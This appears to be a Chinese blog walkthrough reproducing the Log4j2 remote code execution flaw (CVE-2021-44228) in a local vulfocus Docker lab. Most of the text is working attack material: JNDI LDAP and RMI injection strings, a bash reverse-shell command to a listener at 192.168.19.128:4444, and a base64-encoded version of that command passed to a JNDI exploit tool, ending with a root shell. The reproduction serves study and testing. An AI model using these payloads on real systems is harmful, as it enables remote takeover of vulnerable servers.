2021-log4j2漏洞复现CVE-2021-44228-反弹shell 2021-log4j2漏洞复现CVE-2021-44228
2021年12⽉15⽇
12:03
该漏洞是最近新爆出的漏洞能够远程执⾏命令:
该镜像本地可以搭建环境:
apachelog4j2漏洞1、拉取⼀个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09
2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09
使⽤vulfocus可以搭建好环境:
访问该链接:
之后POST传⼊以下payload:
payload=${jndi:ldap://wdhcrj.dnslog/exp}
回显回来了内容dnslog:
本地搭建环境,将镜像拉下来搭建好环境:
之后准备payload:
bash -i >& /dev/tcp/192.168.19.128/4444 0>&1
在kali/2021⽂件夹种有这个⼯具⽣成payload:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOC80NDQ0IDA+JjE=}|{base64,-d}| {bash,-i}" -A "192.168.19.128"
尝试使⽤第⼀个payload:
payload=${jndi:rmi://192.168.19.128:1099/uctfqw}再开⼀个终端可以回弹shell,有root权限:
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论